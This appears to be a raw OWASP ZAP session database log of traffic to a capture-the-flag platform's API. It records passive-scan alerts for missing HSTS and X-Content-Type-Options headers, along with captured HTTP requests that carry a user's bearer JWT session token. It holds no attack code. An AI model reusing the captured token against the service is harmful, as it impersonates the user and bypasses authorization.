WEBSOCKET_MESSAGE VALUES(36,1,'2024-03-02 03:35:08.888000',1,36,NULL,322,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=36 -INSERT INTO LOB_IDS VALUES(36,322,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(22,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',16,16,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(47,22,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(48,22,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=10 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',11,'','https://play.cscg.live') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(23,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',15,15,'','',319,15,3,'','10035-1') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=7 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',8,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(49,23,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=10 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',11,'','h3=":443"; ma=2592000') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(50,23,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=7 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',8,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=10 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',11,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=7 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',8,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=10 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',11,'','Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=7 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',8,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(37,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 38 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=36 -INSERT INTO BLOCKS VALUES(36,1,0) -INSERT INTO BLOCKS VALUES(37,2147483610,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=36 -INSERT INTO LOBS VALUES(36,1,0,37) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(37,1,'2024-03-02 03:35:08.894000',1,37,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=37 -INSERT INTO LOB_IDS VALUES(37,552,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(38,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 39 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=37 -INSERT INTO BLOCKS VALUES(37,1,0) -INSERT INTO BLOCKS VALUES(38,2147483609,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=37 -INSERT INTO LOBS VALUES(37,1,0,38) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(24,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',16,16,'','',693,15,3,'','10021') -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(38,1,'2024-03-02 03:35:08.894000',1,38,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=38 -INSERT INTO LOB_IDS VALUES(38,552,1,40) -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(51,24,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(52,24,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(39,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 40 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=38 -INSERT INTO BLOCKS VALUES(38,1,0) -INSERT INTO BLOCKS VALUES(39,2147483608,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=38 -INSERT INTO LOBS VALUES(38,1,0,39) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(39,1,'2024-03-02 03:35:08.897000',1,39,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=39 -INSERT INTO LOB_IDS VALUES(39,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(17,1709346750724,1,200,1709346910654,366,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:11 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(40,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 41 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=39 -INSERT INTO BLOCKS VALUES(39,1,0) -INSERT INTO BLOCKS VALUES(40,2147483607,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=39 -INSERT INTO LOBS VALUES(39,1,0,40) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(40,1,'2024-03-02 03:35:11.021000',1,40,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=40 -INSERT INTO LOB_IDS VALUES(40,323,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=11 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',12,'','https://play.cscg.live') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(25,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',17,17,'','',319,15,3,'','10035-1') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=8 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',9,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=11 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',12,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=8 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',9,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=11 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',12,'','Caddy') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(53,25,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(54,25,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=8 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',9,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=11 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',12,'','Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=8 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',9,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(41,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 42 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=40 -INSERT INTO BLOCKS VALUES(40,1,0) -INSERT INTO BLOCKS VALUES(41,2147483606,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=40 -INSERT INTO LOBS VALUES(40,1,0,41) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(41,1,'2024-03-02 03:35:11.227000',1,41,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=41 -INSERT INTO LOB_IDS VALUES(41,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(26,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',17,17,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(55,26,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(56,26,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(42,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 43 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=41 -INSERT INTO BLOCKS VALUES(41,1,0) -INSERT INTO BLOCKS VALUES(42,2147483605,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=41 -INSERT INTO LOBS VALUES(41,1,0,42) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(42,1,'2024-03-02 03:35:11.230000',1,42,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=42 -INSERT INTO LOB_IDS VALUES(42,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(18,1709346750724,1,200,1709346912663,382,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Content-Type, Access-Control-Allow-Origin, Vary, Date, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:12 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(43,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 44 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=42 -INSERT INTO BLOCKS VALUES(42,1,0) -INSERT INTO BLOCKS VALUES(43,2147483604,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=42 -INSERT INTO LOBS VALUES(42,1,0,43) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(43,1,'2024-03-02 03:35:13.047000',1,43,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=43 -INSERT INTO LOB_IDS VALUES(43,323,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=12 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',13,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=9 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',10,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message,Content-Type%2C Access-Control-Allow-Origin%2C Vary%2C Date%2C grpc-status%2C grpc-message,Vary%2C Date%2C Content-Type%2C Access-Control-Allow-Origin%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=12 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',13,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=9 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',10,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=12 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',13,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=9 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',10,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=12 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',13,'','Sat%2C 02 Mar 2024 02:35:08 GMT,Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:35:04 GMT,Sat%2C 02 Mar 2024 02:35:12 GMT,Sat%2C 02 Mar 2024 02:35:06 GMT,Sat%2C 02 Mar 2024 02:35:11 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=9 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',10,'','129') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(27,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',18,18,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(57,27,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(58,27,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(44,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 45 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=43 -INSERT INTO BLOCKS VALUES(43,1,0) -INSERT INTO BLOCKS VALUES(44,2147483603,0) 